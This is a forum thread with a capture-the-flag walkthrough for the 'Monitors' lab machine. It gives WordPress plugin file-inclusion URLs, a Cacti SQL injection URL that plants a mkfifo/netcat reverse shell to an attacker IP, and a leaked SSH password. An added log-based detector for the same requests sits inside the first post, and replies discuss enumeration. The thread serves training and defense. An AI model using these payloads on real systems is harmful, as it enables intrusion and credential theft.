TUTORIAL Monitors: user part for free
by siracuso - April 26, 2021 at 10:57 AM
#1
Hi, I'll explain how to get user on the Monitors machine:

Entering the web you can see it shows a domain "monitors.htb". Add it to your /etc/hosts.

It is a WordPress, so scan it using wpscan:
wpscan --url http://monitors.htb/ -e ap,t,tt,u

This plugin is vulnerable:
http://monitors.htb/wp-content/plugins/wp-with-spritz/readme.txt

There is an exploit for it:
https://www.exploit-db.com/exploits/44544

Use LFI: 
http://monitors.htb/wp-content/plugins/wp-with-spritz/wp.spritz.content.filter.php?url=/../../../..//etc/passwd

Use the LFI further to check logs:
http://monitors.htb/wp-content/plugins/wp-with-spritz/wp.spritz.content.filter.php?url=/../../../..//proc/self/fd/10

In the logs we see a Cacti. Add "cacti-admin.monitor.htb" to your /etc/hosts. Enter
http://cacti-admin.monitor.htb
but a password is needed for the admin user.

The password can be spotted in the WordPress config file:
curl "http://monitors.htb/wp-content/plugins/wp-with-spritz/wp.spritz.content.filter.php?url=/../../../..//var/www/wordpress/wp-config.php" | grep -i pass

Password for user admin is 
After logging in to Cacti, there is a SQLi, documented here:
https://github.com/Cacti/cacti/issues/3622

To exploit it, prepare your netcat listener; two requests are needed to trigger it. Just paste the URLs in your browser, setting your IP and port (omit the CSV download file shown after performing the first request).
1. 
http://cacti-admin.monitors.htb/cacti/color.php?action=export&header=false&filter=1%27)+UNION+SELECT+1,username,password,4,5,6,7+from+user_auth;update+settings+set+value=%27rm+/tmp/f%3bmkfifo+/tmp/f%3bcat+/tmp/f|/bin/sh+-i+2%3E%261|nc+10.10.x.x+4444+%3E/tmp/f;%27+where+name=%27path_php_binary%27;--+-
2. 
http://cacti-admin.monitors.htb/cacti/host.php?action=reindex&host_id=1

Now, in the shell as www-data, make it more interactive:
python3 -c 'import pty; pty.spawn("/bin/bash")'

Can't get the flag yet; we need to be user marcus. Searching for the string "marcus" with grep in the whole /etc dir, "grep 'marcus' /etc -R 2>/dev/null", this file is shown:
cat /etc/systemd/system/cacti-backup.service

In that file, this script is referenced:
/home/marcus/.backup/backup.sh

Checking the content of that file, a password used in the script for scp is shown:
VerticalEdge2020

Let's log in as user marcus via ssh using that password:
Enjoy and feel free to give some reputation if you liked it. Root part soon...
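From the defender's side, the two request shapes in this post (a traversal path in the Spritz plugin's url= parameter, and a UNION / stacked query in the Cacti color.php filter= parameter) are easy to pick out of a web server access log. The following detector is an added example written for this thread, not code from the original post or from either project; the log lines it scans are constructed samples in Apache combined format that mimic those request shapes, with the reverse-shell payload replaced by the placeholder value 'x'. Rule names and the set of "sensitive" directories are my own choices.

```python
import posixpath
import re
from urllib.parse import unquote_plus, urlsplit

# Constructed sample access-log lines (Apache combined format). They are made up
# for this example and only mimic the request shapes discussed in the thread;
# the Cacti line carries a harmless placeholder instead of a shell payload.
SAMPLE_LOG = """\
10.10.14.5 - - [26/Apr/2021:10:57:01 +0000] "GET /wp-content/plugins/wp-with-spritz/wp.spritz.content.filter.php?url=/../../../..//etc/passwd HTTP/1.1" 200 1834 "-" "Mozilla/5.0"
10.10.14.5 - - [26/Apr/2021:10:58:12 +0000] "GET /wp-content/plugins/wp-with-spritz/wp.spritz.content.filter.php?url=/../../../..//proc/self/fd/10 HTTP/1.1" 200 40211 "-" "Mozilla/5.0"
10.10.14.5 - - [26/Apr/2021:11:02:44 +0000] "GET /cacti/color.php?action=export&header=false&filter=1%27)+UNION+SELECT+1,username,password,4,5,6,7+from+user_auth;update+settings+set+value=%27x%27+where+name=%27path_php_binary%27;--+- HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.10.14.9 - - [26/Apr/2021:11:03:00 +0000] "GET /cacti/color.php?action=export&header=false&filter=1 HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.10.14.9 - - [26/Apr/2021:11:04:00 +0000] "GET /wp-content/plugins/wp-with-spritz/wp.spritz.content.filter.php?url=https://example.org/article HTTP/1.1" 200 900 "-" "Mozilla/5.0"
"""

# Apache combined format: client IP, timestamp, request line, status code.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# Detection rules applied to every decoded query-string value (names are my own).
RULES = {
    "path_traversal": re.compile(r"\.\.[/\\]"),
    # The Spritz url= parameter is meant to hold a remote URL, so a local absolute
    # path into a system directory (checked after ../ is normalised away) is a file read.
    "local_file_read": re.compile(r"^/(?:etc|proc|var|home|root)/"),
    "sqli_union": re.compile(r"\bunion\b.{0,20}\bselect\b", re.I),
    "sqli_stacked": re.compile(r";\s*(?:update|insert|delete|drop|alter)\b", re.I),
}


def decode_fully(value, rounds=3):
    """Percent-decode repeatedly so double encoding cannot hide ../ or quotes."""
    for _ in range(rounds):
        decoded = unquote_plus(value)
        if decoded == value:
            break
        value = decoded
    return value


def split_query(query):
    """Split only on '&'. Older parse_qs versions also split on ';', which would
    cut the stacked-query half of the Cacti request away from the inspected value."""
    for pair in query.split("&"):
        if not pair:
            continue
        key, _, raw = pair.partition("=")
        yield unquote_plus(key), decode_fully(raw)


def rules_for(value):
    """Return the sorted names of all rules matching the value or its normalised path."""
    candidates = [value]
    if value.startswith("/"):
        candidates.append(posixpath.normpath(value))
    return sorted({name for name, rx in RULES.items()
                   for cand in candidates if rx.search(cand)})


def analyze(log_text):
    """One finding per suspicious query parameter: who sent it, where, and which rules fired."""
    findings = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        parts = urlsplit(m.group("target"))
        for param, value in split_query(parts.query):
            matched = rules_for(value)
            if matched:
                findings.append({"ip": m.group("ip"), "path": parts.path,
                                 "param": param, "rules": matched,
                                 "value": value[:80]})
    return findings


if __name__ == "__main__":
    for f in analyze(SAMPLE_LOG):
        print(f"{f['ip']} {f['path']} {f['param']}= {','.join(f['rules'])}  {f['value']!r}")
```

Run against the constructed lines it reports the two traversal reads and the Cacti export request and stays quiet on the two legitimate requests. The same three-parameter logic (decode fully, split on `&` only, test the normalised path) ports directly to a SIEM rule; note that blocking direct IP access, as one reply below hit, does nothing against these requests because they arrive with a valid Host header.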
#2
Thank you for nice share.
#3
You don't explain how you found it.
You just say you need to cat the service, but not the enumeration.
#4
(April 26, 2021 at 01:52 PM)paulwatson42016 Wrote: You don't explain how you found it.
You just say you need to cat the service, but not the enumeration.

It seems you didn't read it all.
Quote: Can't get the flag yet; we need to be user marcus. Searching for the string "marcus" with grep in the whole /etc dir, "grep 'marcus' /etc -R 2>/dev/null", this file is shown:

So, as explained, searching for marcus-related stuff in /etc/ using this command:
grep 'marcus' /etc -R 2>/dev/null

revealed what to do. It is explained. Read it slowly next time before posting.
#5
Strange, I got this error after adding cacti-admin.monitor.htb to the hosts file and visiting from the browser.

Sorry, direct IP access is not allowed.

If you are having issues accessing the site then contact the website administrator: [email protected]
#6
(April 26, 2021 at 06:43 PM)magicianlin21 Wrote: Strange, I got this error after adding cacti-admin.monitor.htb to the hosts file and visiting from the browser.

Sorry, direct IP access is not allowed.

If you are having issues accessing the site then contact the website administrator: [email protected]

Obviously you didn't add it correctly to your hosts file.
#7
Thanks in advance bro, will try to root it.
#8
(April 26, 2021 at 02:23 PM)siracuso Wrote:
(April 26, 2021 at 01:52 PM)paulwatson42016 Wrote: You don't explain how you found it.
You just say you need to cat the service, but not the enumeration.

It seems you didn't read it all.
Quote: Can't get the flag yet; we need to be user marcus. Searching for the string "marcus" with grep in the whole /etc dir, "grep 'marcus' /etc -R 2>/dev/null", this file is shown:

So, as explained, searching for marcus-related stuff in /etc/ using this command:
grep 'marcus' /etc -R 2>/dev/null

revealed what to do. It is explained. Read it slowly next time before posting.

No, I'm not saying that.
I'm saying: why would you randomly grep one directory for your username?
What you do instead is use the find command and look for permissions you can use,
like find suid.
#9
Now I understand you better. Anyway, it is good practice, if you want to escalate horizontally to a user, to grep its name around dirs to check whether there is some content related to it. In this case, it worked.
#10
(April 26, 2021 at 10:57 AM)siracuso Wrote: Hi, I'll explain how to get user on the Monitors machine:

Hi, thank you for sharing the process for the user shell. At first, when I tried to access the logs to find the vhost, it worked, but now it doesn't. Is there any other way to find the vhost? Thank you.